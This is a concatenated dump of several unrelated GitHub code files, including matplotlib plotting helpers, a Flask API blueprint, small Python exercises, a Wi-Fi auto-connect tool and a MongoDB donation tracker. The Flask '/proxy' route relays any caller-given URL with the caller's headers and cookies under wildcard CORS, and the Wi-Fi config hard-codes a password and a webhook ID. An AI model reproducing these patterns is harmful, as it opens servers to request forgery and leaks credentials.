matplotlib.dates.DateFormatter(\"%b\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.MonthLocator())\n elif style in (\"month2\", \"month3\", \"month4\"):\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%b\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.MonthLocator(interval=int(style[-1])))\n elif style == \"year\":\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%Y\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.YearLocator())\n elif style == \"week\":\n self.xaxis.set_major_formatter(\n matplotlib.dates.DateFormatter(\"%W\"))\n self.xaxis.set_major_locator(\n matplotlib.dates.WeekdayLocator(\n byweekday=matplotlib.dates.SU, interval=2))\n\n def barplot(self, data, labels, colors, **kwargs):\n \"\"\"Bar plot\"\"\"\n\n options = {\"city_distance\": 0.2,\n \"house_distance\": 0.1,\n \"padding\": 0,\n \"leg_place\": \"fig\",\n \"alpha\": 1,\n \"capsize\": 2}\n options.update(kwargs)\n\n labels = collections.defaultdict(lambda: [None], labels)\n\n options[\"house_space\"] = ((1 - options[\"city_distance\"]) /\n len(labels[\"house\"]))\n options[\"house_width\"] = ((1 - options[\"house_distance\"]) *\n options[\"house_space\"])\n\n for house in range(len(labels[\"house\"])):\n yoff = numpy.zeros(len(labels[\"city\"]))\n for floor in range(len(labels[\"floor\"])):\n non_zeros = []\n bar_data = []\n indent = []\n for city in range(len(labels[\"city\"])):\n city_values = [\n (value, 0, 0) if isinstance(value, numbers.Number) else\n value\n for key, value in data.items()\n if (labels[\"city\"][city] in key or\n labels[\"city\"] == [None]) and\n (labels[\"house\"][house] in key or\n labels[\"house\"] == [None]) and\n (labels[\"floor\"][floor] in key or\n labels[\"floor\"] == [None])]\n if len(city_values) > 0:\n bar_data.append(numpy.sum(city_values, axis=0))\n non_zeros.append(city)\n else:\n bar_data.append([0, 0, 0])\n indent.append(\n city +\n 0.5 * (options[\"city_distance\"] +\n options[\"house_distance\"] *\n options[\"house_space\"]) +\n house * options[\"house_space\"])\n\n if len(bar_data) == 0:\n raise PyfigError(\"Empty barplot\")\n bar_data = numpy.array(bar_data)\n indent = numpy.array(indent)\n label, color = self._get_barcolor(labels, colors,\n house, floor)\n# ax.plot(\n# indent[non_zeros],\n# bar_data[non_zeros, 0],\n# linestyle=None,\n# color=black)\n if isinstance(color, list) and None in color:\n color = None\n if color is not None:\n self.bar(\n indent[non_zeros],\n bar_data[non_zeros, 0],\n width=options[\"house_width\"],\n color=color,\n label=label,\n bottom=yoff[non_zeros],\n leg_place=options[\"leg_place\"])\n if bar_data[:, 1:].sum() > 0:\n self.errorbar(\n indent[non_zeros] + 0.5 * options[\"house_width\"],\n bar_data[non_zeros, 0] + yoff[non_zeros],\n yerr=bar_data[non_zeros, 1:].transpose(),\n fmt=\"o\" if color is None else \"none\",\n ecolor=\"black\",\n color=\"black\",\n linewidth=0.6,\n capsize=options[\"capsize\"])\n yoff += bar_data[:, 0]\n\n self.set_xticks(numpy.arange(len(labels[\"city\"])) + 0.5)\n self.set_xticklabels([\"{0}\".format(label).replace(\"__\", \"\\n\")\n for label in labels[\"city\"]])\n self.set_xlim(0 - options[\"padding\"],\n len(labels[\"city\"]) + options[\"padding\"])\n for tick in self.get_xticklines():\n tick.set_markersize(0)\n\n def _get_barcolor(self, labels, colors, house, floor):\n \"\"\"Get the color of the bars\"\"\"\n\n if \"city\" in colors:\n color = colors[\"city\"][0:len(labels[\"city\"])]\n label = None\n\n elif (labels[\"house\"][house] is not None and\n labels[\"floor\"][floor] is not None):\n\n house_color = self.parse_color(colors[\"house\"][house])\n if \"hatch\" in house_color:\n hatchlabel = labels[\"house\"][house]\n hatch = house_color.pop(\"hatch\")\n color = house_color\n else:\n label = labels[\"house\"][house]\n\n floor_color = self.parse_color(colors[\"floor\"][floor])\n if \"hatch\" in floor_color:\n hatchlabel = labels[\"floor\"][floor]\n hatch = floor_color.pop(\"hatch\")\n color = floor_color\n else:\n label = labels[\"floor\"][floor]\n\n # Draw temporary bar for hatch legend\n logger.error(\"hatch=%s, hatchlabel=%s\", hatch, hatchlabel)\n# ax.bar(indent[non_zeros],\n# bar_data[non_zeros, 0],\n# options[\"house_width\"],\n# color=\"white\",\n# label=hatchlabel,\n# bottom=yoff[non_zeros],\n# hatch=hatch,\n# leg_place=\"fig2\")\n\n elif labels[\"house\"][house] is not None:\n color = colors[\"house\"][house]\n label = labels[\"house\"][house]\n elif labels[\"floor\"][floor] is not None:\n color = colors[\"floor\"][floor]\n label = labels[\"floor\"][floor]\n\n# elif \"house\" in colors and house < len(colors[\"house\"]):\n# # Empty house labels\n# color = colors[\"house\"][house]\n# elif \"floor\" in colors and floor < len(colors[\"floor\"]):\n# # Empty floor labels\n# color = colors[\"floor\"][floor]\n else:\n sys.exit(\"No house/floor available\")\n\n# if label and isinstance(label, six.string_types):\n# label = label.replace(\"__\", \"\\n\")\n\n if isinstance(color, list) and color[0] == \"mix\":\n color = \"mix\"\n\n return label, color\n\n @staticmethod\n def parse_color(color):\n \"\"\"Parse the color, return a dict with\n color, hatch (optional), and alpha (optional)\"\"\"\n\n cache = tools.Cache()\n result = {}\n\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*h\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"hatch\"] = cache.output.group(1)\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*a\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"alpha\"] = float(cache.output.group(1))\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*s\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"linestyle\"] = cache.output.group(1)\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"-*m\\((.*?)\\)\", color))):\n color = color.replace(cache.output.group(), \"\")\n result[\"marker\"] = cache.output.group(1)\n\n if color == \"\":\n color = \"white\"\n\n if (isinstance(color, six.string_types) and\n cache(re.search(r\"hex\\((.*)\\)\", color))):\n color = cache.output.group(1)\n color = (int(color[0:2], 16) / 255,\n int(color[2:4], 16) / 255,\n int(color[4:6], 16) / 255)\n\n if isinstance(color, six.string_types):\n all_numbers = re.findall(r\"[\\.\\d]+\", color)\n if len(all_numbers) == 3:\n color = [float(number) for number in all_numbers]\n if max(color) > 1:\n color = [number / 255 for number in color]\n\n result[\"color\"] = color\n return result\n\n def __lt__(self, other):\n if isinstance(other, six.string_types):\n result = False\n else:\n result = (\n self.min_row < other.min_row or\n self.min_row == other.min_row and self.min_col < other.min_col)\n if self.fig.settings[\"abc_reverse\"]:\n result = not result\n return result\n\n def __gt__(self, other):\n return not self.__lt__(other)\n\n def _update_mix(self, kwargs, label, leg_place):\n \"\"\"Update the elements with color/line/.. = mix\"\"\"\n\n cache = tools.Cache()\n\n if leg_place not in self.fig.repo:\n self.fig.repo[leg_place] = list(self.fig.repo[\"all\"])\n style = self.fig.style[leg_place]\n repo = self.fig.repo[leg_place]\n\n for subcolor in (key for key in kwargs.keys()\n if key.endswith(\"color\")):\n if kwargs[subcolor] == \"mix\":\n elemlabel = label\n elif (isinstance(kwargs[subcolor], six.string_types) and\n cache(re.search(r\"mix\\((.*)\\)\", kwargs[subcolor]))):\n elemlabel = cache.output.group(1)\n else:\n continue\n\n if elemlabel in style:\n kwargs[subcolor] = style[elemlabel]\n # TODO: remove possible same color still in style\n# if style[elemlabel] in repo:\n# repo.remove(style[elemlabel])\n else:\n kwargs[subcolor] = repo[0] if len(repo) == 1 else repo.pop(0)\n style[elemlabel] = kwargs[subcolor]\n","repo_name":"Epispread/Pyfig","sub_path":"pyfig/ax.py","file_name":"ax.py","file_ext":"py","file_size_in_byte":25368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719494411","text":"from flask import Blueprint, current_app, request, Response\nfrom flask_cors import cross_origin\nimport os\nimport requests\nfrom urllib.parse import unquote_plus, urlparse\n\nfrom ..db import DBClient\nfrom ..elastic import ElasticClient\nfrom ..utils import APIUtils\nfrom logger import createLog\n\nlogger = createLog(__name__)\n\n\nutils = Blueprint('utils', __name__, url_prefix='/utils')\n\n\n@utils.route('/languages', methods=['GET'])\ndef languageCounts():\n esClient = ElasticClient(current_app.config['REDIS_CLIENT'])\n\n reqParams = APIUtils.normalizeQueryParams(request.args)\n workCounts = reqParams.get('totals', ['true'])[0].lower() != 'false'\n\n langResult = esClient.languageQuery(workCounts)\n\n languageList = APIUtils.formatLanguages(\n langResult.aggregations, workCounts\n )\n\n logger.debug('Language list 200 OK on /utils/languages')\n\n return APIUtils.formatResponseObject(200, 'languageCounts', languageList)\n\n\n@utils.route('/counts', methods=['GET'])\ndef totalCounts():\n dbClient = DBClient(current_app.config['DB_CLIENT'])\n dbClient.createSession()\n\n totalResult = dbClient.fetchRowCounts()\n\n totalsSummary = APIUtils.formatTotals(totalResult)\n\n dbClient.closeSession()\n\n return APIUtils.formatResponseObject(200, 'totalCounts', totalsSummary)\n\n\n@utils.route('/proxy', methods=['GET', 'POST', 'PUT', 'HEAD', 'OPTIONS'])\n@cross_origin(origins=os.environ.get('API_PROXY_CORS_ALLOWED', '*'))\ndef getProxyResponse():\n proxyUrl = request.args.get('proxy_url')\n\n cleanUrl = unquote_plus(proxyUrl)\n\n urlParts = urlparse(cleanUrl)\n\n while True:\n headResp = requests.head(\n cleanUrl, headers={'User-agent': 'Mozilla/5.0'}\n )\n\n statusCode = headResp.status_code\n print(statusCode, cleanUrl)\n if statusCode in [200, 204]:\n break\n elif statusCode in [301, 302, 303, 307, 308]:\n print(headResp.headers)\n cleanUrl = headResp.headers['Location']\n\n if cleanUrl[0] == '/':\n cleanUrl = '{}://{}{}'.format(\n urlParts.scheme, urlParts.netloc, cleanUrl\n )\n else:\n logger.warn('Unable to proxy URL {}'.format(cleanUrl))\n cleanUrl = proxyUrl\n break\n\n\n resp = requests.request(\n method=request.method,\n url=cleanUrl,\n headers={k: v for (k, v) in request.headers if k != 'Host'},\n data=request.get_data(),\n cookies=request.cookies,\n allow_redirects=False\n )\n\n excludedHeaders = [\n 'content-encoding', 'content-length', 'transfer-encoding',\n 'x-frame-options', 'referrer-policy', 'access-control-allow-origin',\n 'connection', 'keep-alive', 'public', 'proxy-authenticate',\n 'upgrade'\n ]\n\n headers = [\n (k, v) for (k, v) in resp.headers.items()\n if k.lower() not in excludedHeaders\n ]\n\n proxyResp = Response(resp.content, resp.status_code, headers)\n return proxyResp\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"api/blueprints/drbUtils.py","file_name":"drbUtils.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72022393387","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 6 13:01:14 2019\r\n\r\n@author: JL\r\n\"\"\"\r\nimport random\r\n\r\nclass lotto(object):\r\n \r\n def __init__(self,allnumber,chooseCount):\r\n self.allnumber=allnumber\r\n self.chooseCount=chooseCount\r\n \r\n def lottoChoose(self):\r\n chooseNumberLst=list()\r\n allnumberLst=list(range(1,self.allnumber+1))\r\n while True:\r\n chooseNumber=random.choice(allnumberLst)\r\n chooseNumberLst.append(chooseNumber)\r\n allnumberLst.remove(chooseNumber)\r\n if self.chooseCount==len(chooseNumberLst):\r\n break\r\n return chooseNumberLst\r\n \r\n def bubbleSorted(self,iterable):\r\n new_list = list(iterable)\r\n list_len = len(new_list)\r\n for i in range(list_len-1):\r\n for j in range(list_len-1,i,-1):\r\n if new_list[j] < new_list[j-1]:\r\n new_list[j],new_list[j-1] = new_list[j-1], new_list[j]\r\n return new_list\r\n \r\n def insertionSort(self,lst):\r\n for i in range(1, len(lst)):\r\n temp = lst[i]\r\n j = i - 1\r\n while j >= 0 and temp < lst[j]:\r\n lst[j + 1] = lst[j]\r\n j -= 1\r\n lst[j + 1] = temp\r\n return lst\r\n \r\nif __name__ == '__main__': \r\n allnumber=int(input(\"請輸入樂透號碼所有數量:\"))\r\n chooseCount=int(input(\"請輸入樂透選取數量:\"))\r\n lottoCls=lotto(allnumber,chooseCount)\r\n lottoNumberLst=lottoCls.lottoChoose()\r\n lottoNumberSort=lottoCls.insertionSort(lst=lottoNumberLst)\r\n print(\"本期樂透號碼:%s\"%(lottoNumberSort))\r\n","repo_name":"build0220/Python-Basic","sub_path":"HomeWork/0305HW_JL.py","file_name":"0305HW_JL.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32028181850","text":"import os,json\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.metrics import f1_score,accuracy_score\n\n\nimport matplotlib\nmatplotlib.use(\"pgf\")\nmatplotlib.rcParams.update({\n \"pgf.texsystem\": \"pdflatex\",\n 'font.family': 'serif',\n 'text.usetex': True,\n 'pgf.rcfonts': False,\n})\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nARTICLE_DIR = os.path.join(BASE_DIR,\"article\",\"lak2021\")\n\n#careful if dir names change\nRESULTS_DIR = os.path.join(BASE_DIR,\"tmp\",\"fine_grained_arg_rankings\")\n\ndef switch_exp_summary(x):\n d={}\n d[\"n\"]=x[\"timestep\"].max()\n d[\"acc_LR\"]=np.round(\n accuracy_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_LR\"]\n ),4\n )\n d[\"acc_RF\"]=np.round(\n accuracy_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_RF\"]\n ),4\n )\n d[\"f1_LR\"]=np.round(\n f1_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_LR\"]\n ),4\n )\n d[\"f1_RF\"]=np.round(\n f1_score(\n y_true=x[\"y_true\"],\n y_pred=x[\"prediction_RF\"]\n ),4\n )\n\n return pd.Series(d,index=[\"n\",\"acc_LR\",\"acc_RF\",\"f1_LR\",\"f1_RF\"])\n\n\ndef summary_by_disc(x):\n d={}\n d[\"n\"]=\"{:0.0f}\".format(x[\"n\"].sum())\n d[\"acc_LR\"]=\"{:0.2f} ({:0.2f})\".format(\n np.average(x[\"acc_LR\"],weights=x[\"n\"]),\n np.std(x[\"acc_LR\"])\n )\n d[\"acc_RF\"]=\"{:0.2f} ({:0.2f})\".format(\n np.average(x[\"acc_RF\"],weights=x[\"n\"]),\n np.std(x[\"acc_RF\"])\n )\n return(pd.Series(d,index=[\"n\",\"acc_LR\",\"acc_RF\"]))\n\n\n\n\ndef main():\n disciplines=[\"Physics\",\"Chemistry\",\"Biology\"]\n\n ###########\n # accuracy\n results=[]\n cols=[\"topic\",\"timestep\",\"test_answer_id\",\"n\",\"y_true\"]\n cols_pred=[\"prediction_LR\",\"prediction_RF\"]\n\n for discipline in disciplines:\n results_dir_discipline = os.path.join(RESULTS_DIR,discipline,\"results\")\n topics=os.listdir(results_dir_discipline)\n for topic in topics:\n fp=os.path.join(results_dir_discipline,topic)\n with open(fp,\"r\") as f:\n d=json.load(f)\n for dt in d:\n if dt:\n dtf={c:dt[c] for c in cols}\n for c in cols_pred:\n dtf.update({c:dt[c][0]})\n dtf.update({\"discipline\":discipline})\n results.append(dtf)\n df=pd.DataFrame(results)\n\n df_d=df.groupby([\"discipline\",\"topic\"]).apply(lambda x: switch_exp_summary(x))\n\n\n df_final=df_d.groupby(\"discipline\").apply(lambda x: summary_by_disc(x))\n\n fp=os.path.join(ARTICLE_DIR,\"data\",\"switch_exp_acc.tex\")\n df_final.to_latex(fp)\n\n #####################\n # feature importances\n results_f=[]\n cols=[\"topic\",\"timestep\",\"n\"]\n cols_features=[\"feature_names_LR\",\"feature_names_RF\"]\n disciplines=[\"Biology\",\"Chemistry\",\"Physics\"]\n for discipline in disciplines:\n results_dir_discipline = os.path.join(RESULTS_DIR,discipline,\"results\")\n topics=os.listdir(results_dir_discipline)\n for topic in topics:\n fp=os.path.join(results_dir_discipline,topic)\n with open(fp,\"r\") as f:\n d=json.load(f)\n for dt in d:\n if dt:\n for col_feature in cols_features:\n dtfa={\n \"topic\":topic,\n \"model\":col_feature[-2:],\n \"timestep\":dt[\"timestep\"],\n \"pred_true\":bool(\n dt[\"prediction_{}\".format(col_feature[-2:])][0]==dt[\"y_true\"]\n )\n }\n dtf=dt[col_feature]\n for weight,feature_name in dtf:\n dtfa.update({feature_name:weight})\n dtfa.update({\"discipline\":discipline})\n results_f.append(dtfa)\n dff=pd.DataFrame(results_f)\n # dff.groupby(\"discipline\").size()\n cols_features=['rationale_word_count',\n 'shown_rationale_word_count_mean', 'shown_convincingness_BT_mean',\n 'shown_convincingness_baseline_mean', 'shown_rationale_word_count_max',\n 'shown_convincingness_BT_max', 'shown_convincingness_baseline_max',\n 'shown_rationale_word_count_min', 'shown_convincingness_BT_min',\n 'shown_convincingness_baseline_min', 'n_shown_short',\n 'n_shown_shorter_than_own', 'n_shown_longer_than_own', 'first_correct']\n\n dfrf=dff[dff[\"model\"]==\"RF\"].copy()\n\n means=dfrf[cols_features].mean()\n stds=dfrf[cols_features].std()\n\n df_means=means.to_frame().rename(columns={0:\"mean\"}).join(\n stds.to_frame().rename(columns={0:\"std\"})\n ).sort_values(\"mean\",ascending=False)\n\n ftypes=[]\n for f in list(df_means.index):\n if \"baseline\" in f:\n ftypes.append(\"WinRate\")\n elif \"BT\" in f:\n ftypes.append(\"BT\")\n else:\n ftypes.append(\"Surface\")\n df_means[\"type\"]=ftypes\n\n\n df_means.index=df_means.index\\\n .str.replace(\"shown_\",\"\")\\\n .str.replace(\"convincingness_\",\"\")\\\n .str.replace(\"baseline\",\"WinRate\")\\\n .str.replace(\"rationale_\",\"\")\\\n .str.replace(\"word_count\",\"WC\")\n\n colors={\n \"Surface\":\"lightgrey\",\n \"WinRate\":\"red\",\n \"BT\":\"royalblue\"\n }\n\n df_means[\"color\"]=df_means[\"type\"].map(colors)\n\n # df_means\n plt.bar(\n x=df_means.index,\n height=df_means[\"mean\"],\n yerr=df_means[\"std\"],\n color=df_means[\"color\"],\n error_kw=dict(ecolor='gray', lw=1, capsize=2, capthick=1)\n )\n plt.xticks(range(df_means.shape[0]),df_means.index,rotation=75)\n plt.ylabel(\"Average Feature Importance in Random Forest\")\n fp=os.path.join(ARTICLE_DIR,\"img\",\"switch_exp_RF.pgf\")\n plt.savefig(fp)\n\nif __name__ == \"__main__\":\n import plac\n\n plac.call(main)\n","repo_name":"sameerbhatnagar/convincingness","sub_path":"code/publication_plots/switch_exp_results.py","file_name":"switch_exp_results.py","file_ext":"py","file_size_in_byte":6010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18770159141","text":"'''\n분류 : 그리디 알고리즘\n문제 : 컵홀더 (백준 2810)\n작성일자 : 2021.03.13\n'''\n# 좌석 양 끝에 컵홀더가 1개씩 있고, 커플석에는 가운데는 없다\n## 목적 : 컵을 꽂을 수 있는 최대 사람의 수 출력\n## 접근 : 현재 자리에서 최대한 사용할 수 있는 컵홀더 모두 사용\n## 첫 커플석 자리만 2개 사용가능 하다는 조건 찾아내기\n## LL을 L로 바꾸는 방법은 replace를 사용 가능하다 \n# seats = input().replace('LL','L')\n### 아니면 L의 개수를 모두 더한뒤 나누기 2를 해주면 L을 한번만 세는 걸로도 가능하다\nN = int(input())\ncup = input()\nseats = []\nfor s in cup : \n seats.append(s)\ns_cnt = seats.count('S')\nl_cnt = seats.count('L')//2\nif l_cnt == 1 : \n print(s_cnt+2)\nelif l_cnt > 1 : \n print(s_cnt+l_cnt+1)\nelse : \n print(s_cnt)","repo_name":"ykiseong303/ProblemSolving","sub_path":"Baekjoon_python/greedy/greedy_35.py","file_name":"greedy_35.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33938428854","text":"#coding:utf-8\nfrom weibocrawler import dboperator\nfrom weibocrawler import DirOperator\nfrom weibocrawler.config import getconfig\nfrom networkx import *\nimport networkx as nx\nimport csv\n\n'''得到种子群体UserId'''\ndef getUserId():\n\tcfg = getconfig()\n\tCollection_UserHomePages = cfg['Collections']['UserHomePages']\n\tdbo = dboperator.Dboperator(collname = Collection_UserHomePages)\n\tuserIds = dbo.coll.distinct(\"userId\")\n\t# print(len(userIds))\n\treturn userIds\n\ndef output_extend_users(dbo,extend_users_dir):\n\tcursor = dbo.coll.find({},{\"followeeId\":1, \"userId\": 1})\n\tedge_list = list()\n\tfor c in cursor:\n\t\t# str_pair = str(c[\"userId\"])+\",\"+str(c[\"followeeId\"])\n\t\t# t = tuple(str_pair.split(','))\n\t\tt = (c[\"userId\"],c[\"followeeId\"])\n\t\tedge_list.append(t)\n\tG = nx.DiGraph()\n\tG.add_edges_from(edge_list)\n\tG1 = nx.Graph(G)\n\tdict_x = clustering(G1)\n\tsort_x = sorted(dict_x.items(), key=lambda item: item[1], reverse=True)\n\tuserIds = getUserId()\n\n\toutput_filename = extend_users_dir + 'extend_users.csv'\n\tcsvfile = open(output_filename,'w',newline=\"\")\n\twriter = csv.writer(csvfile,dialect='excel')\n\twriter.writerow(['用户ID', '权重'])\n\n\tfor x, y in sort_x:\n\t\t# print(str(x)+':'+str(y))\n\t\tif x in userIds:\n\t\t\tcontinue\n\t\telse:\n\t\t\tif y > 0:\n\t\t\t\twriter.writerow([str(x), str(y)])\n\tcsvfile.close()\n\ndef main():\n\tcfg = getconfig()\n\tCollection_UserRelations = cfg['Collections']['UserRelations']\n\tdbo = dboperator.Dboperator(collname = Collection_UserRelations)\n\n\tdb_name = cfg['MongoDBConnection']['db']\n\toutput_dir = 'DATA//' + db_name\n\tDirOperator.DirOperator(output_dir)\n\textend_users_dir = output_dir+'//'\n\t\n\toutput_extend_users(dbo,extend_users_dir)\n\tdbo.connclose()\n","repo_name":"dbc1040/WeiboCrawler","sub_path":"weibocrawler/output_extend_users.py","file_name":"output_extend_users.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2416624257","text":"name_1,name_2 = input().split()\nf1 = open(name_1,'r')\nf2 = open(name_2,'r')\nf1_line = f1.readlines()\nf2_line = f2.readlines()\nsum = f1_line+f2_line\n\nsum = [x.split() for x in sum]\nsum = [[a[-2:],[a,b]] for a,b in sum]\nsum.sort()\nfor x in sum:\n print(x[1][0],x[1][1])\n\n\nf1.close()\nf2.close()\n","repo_name":"blazxex/2110101_CompProg","sub_path":"07_StrFile/07_StrFile_File_Merge.py","file_name":"07_StrFile_File_Merge.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15600002153","text":"\"\"\"\nModule containing code for a workflow service.\n\"\"\"\nfrom uuid import UUID\nfrom internal.database import Session\nfrom internal.database.model import new_workflow\nfrom internal.database.query import select_workflow, update_workflow, delete_workflow\nfrom internal.service.model.dto import WorkflowDto\nfrom internal.transport.model.contracts import WorkflowSettings\n\n\nclass WorkflowService:\n \"\"\"\n A service class for working with processing workflows.\n \"\"\"\n\n @staticmethod\n def add_workflow(id: UUID, settings: WorkflowSettings):\n \"\"\"\n Method for adding a new workflow in the system.\n \"\"\"\n session = Session()\n session.add(new_workflow(\n id,\n settings.is_full_page_recognition,\n settings.skip_img_enchancement,\n settings.expect_diff_images\n ))\n session.commit()\n\n @staticmethod\n def get_workflow(workflow_id: UUID):\n session = Session()\n rows = session.execute(select_workflow(workflow_id)).all()\n session.commit()\n if len(rows) == 0: return None\n return [WorkflowDto(row[0], row[1], row[2], row[3]) for row in rows][0]\n\n @staticmethod\n def delete_workflow(workflow_id: UUID):\n \"\"\"\n A method for deleting a specific workflow in the system.\n \"\"\"\n session = Session()\n session.execute(delete_workflow(workflow_id))\n session.commit()\n\n @staticmethod\n def update_workflow(id: UUID, settings: WorkflowSettings) -> bool:\n \"\"\"\n A method for updating a specific workflow.\n \"\"\"\n session = Session()\n session.execute(\n update_workflow(WorkflowDto(\n id,\n settings.is_full_page_recognition,\n settings.expect_diff_images,\n settings.skip_img_enchancement)\n )\n )\n session.commit()\n return True\n","repo_name":"MichalMoudry/mrf-recognition-service","sub_path":"src/internal/service/workflow_service.py","file_name":"workflow_service.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73341170348","text":"#!/bin/env python3\n# coding: utf8\n\"\"\"\n@File Name : bin/send_message_to_feishu.py\n@Author : LeeCQ\n@Date-Time : 2023/9/19 14:53\n\n网络管理\n\"\"\"\n\nimport logging\nfrom pathlib import Path\n\nimport typer\nimport yaml\n\nimport _base\n\n_base.logging_configurator(\n name=\"network-manager\",\n console_print=True,\n console_level=\"INFO\" if _base.IS_SYSTEMD else \"DEBUG\",\n file_level=\"DEBUG\" if _base.IS_SYSTEMD else \"INFO\",\n)\n\nlogger = logging.getLogger(\"host-service.bin.network-manager\")\napp = typer.Typer()\n\nCONFIG = \"\"\"\nversion: 1\n\nwifi:\n - ssid: ziroom302\n password: 4001001111\n \n - ssid: WalmartGuest\n mac: c8:03:ed:33:a0:ad\n \nfeishu:\n hook_id: 9e40f223-0199-438a-a620-cf01b443dabc\n keyword: null\n\"\"\"\n\n\n@app.command()\ndef auto_connect_wifi(config_file: Path):\n \"\"\"自动连接Wi-Fi\"\"\"\n from network_manager.auto_connect_wifi import AutoConfigWifi, WifiConfig\n\n config_dict = yaml.safe_load(config_file.read_text(encoding=\"utf8\"))\n logger.info(\"Loaded Config File Success.\")\n\n config = AutoConfigWifi([WifiConfig(**{k: str(v) for k,v in wifi.items()}) for wifi in config_dict[\"wifi\"]])\n status = config.connect()\n logger.info(\"Connect Wi-Fi: %s\", status)\n\n from send_ip_to_feishu import send_ip\n\n return send_ip(**config_dict[\"feishu\"])\n\n\nif __name__ == \"__main__\":\n app()","repo_name":"lee-cq/host-service","sub_path":"bin/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23595298158","text":"#!/usr/bin/env python3\n\n'''\nAuthor: Eric Rosko\nLesson: Session 8\nFile: mailroom.py\nDate: june 3, 2018\nDescription:\n Session 8 homework. This is my mongodb implementation of the mailroom\n program.\n\nUsage:\n python3 mailroom.py\n'''\n\nimport logging\nfrom peewee import *\nfrom operator import *\nimport io\nimport login_database\nimport pprint\nimport utilities\nimport learn_data\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.info('Starting logger...')\n\n\ndef add_donation():\n fullname = input(\"Enter name of donor: \")\n amount = input(\"Enter donation amount: \")\n mailroom.add_donation(fullname, amount)\n\n list_donations()\n\n\ndef list_donations():\n print(\"Current list of donations: \")\n print(mailroom.printable_donations())\n print()\n\n\ndef rename_donor():\n old_name = input(\"Enter current name of donor: \")\n new_name = input(\"Enter new name of donor:\")\n mailroom.rename_donations(old_name, new_name)\n\n list_donations()\n\n\ndef delete_donor():\n fullname = input(\"Enter name of donor to delete: \")\n mailroom.delete_donations(fullname)\n list_donations()\n\n\ndef store_secret():\n fullname = input(\"Enter name of donor: \")\n secret = input(\"Enter the secret data to temporarily store: \")\n mailroom.store_temporary_data(fullname, secret)\n\n\ndef retrieve_secret():\n fullname = input(\"Enter name of donor to retrieve secret note: \")\n print(\"THE SECRET IS:\", mailroom.retrieve_temporary_data(fullname))\n\n\nclass MailroomMongo():\n\n def __init__(self):\n pass\n\n\n def add_donor(self, name):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donors = db['donors']\n\n results = donors.insert_one({'name': name})\n\n\n def get_donors(self):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donors = db['donors']\n\n cursor = donors.find({}).sort('name', 1)\n\n all_donors = []\n for doc in cursor:\n all_donors.append(doc['name'])\n # print(f\"Name: {doc['name']}\")\n\n return all_donors\n\n\n def add_donation(self, donor, amount):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n result = donations.insert_one({\n 'donor': donor,\n 'amount': amount})\n print(\"added\", result)\n\n\n def get_donations(self, donor):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n list_donations = []\n cursor = donations.find({\"donor\": {\"$eq\": donor}})\n for doc in cursor:\n # print(doc['amount'], doc['donor'])\n d = doc['amount']\n list_donations.append(d)\n return list_donations\n\n\n def rename_donations(self, old_name, new_name):\n if old_name == new_name:\n return\n\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n cursor = donations.find({\"donor\": {\"$eq\": old_name}})\n for doc in cursor:\n d = doc['amount']\n self.add_donation(new_name, d)\n\n donations.delete_many({\"donor\": {\"$eq\": old_name}})\n\n\n def delete_donations(self, donor):\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n donations.delete_many({\"donor\": {\"$eq\": donor}})\n\n\n def printable_donations(self):\n\n with login_database.login_mongodb_cloud() as client:\n db = client['mailroom']\n donations = db['donations']\n\n output = \"\"\n cursor = donations.find({})\n for doc in cursor:\n output += f\"Donor: {doc['donor']} Amount: ${doc['amount']}\\n\"\n # print(doc['amount'], doc['donor'])\n\n return output\n\n\n def wipe_database(self):\n with login_database.login_mongodb_cloud() as client:\n client['mailroom'].drop_collection('donors')\n client['mailroom'].drop_collection('donations')\n\n\n def 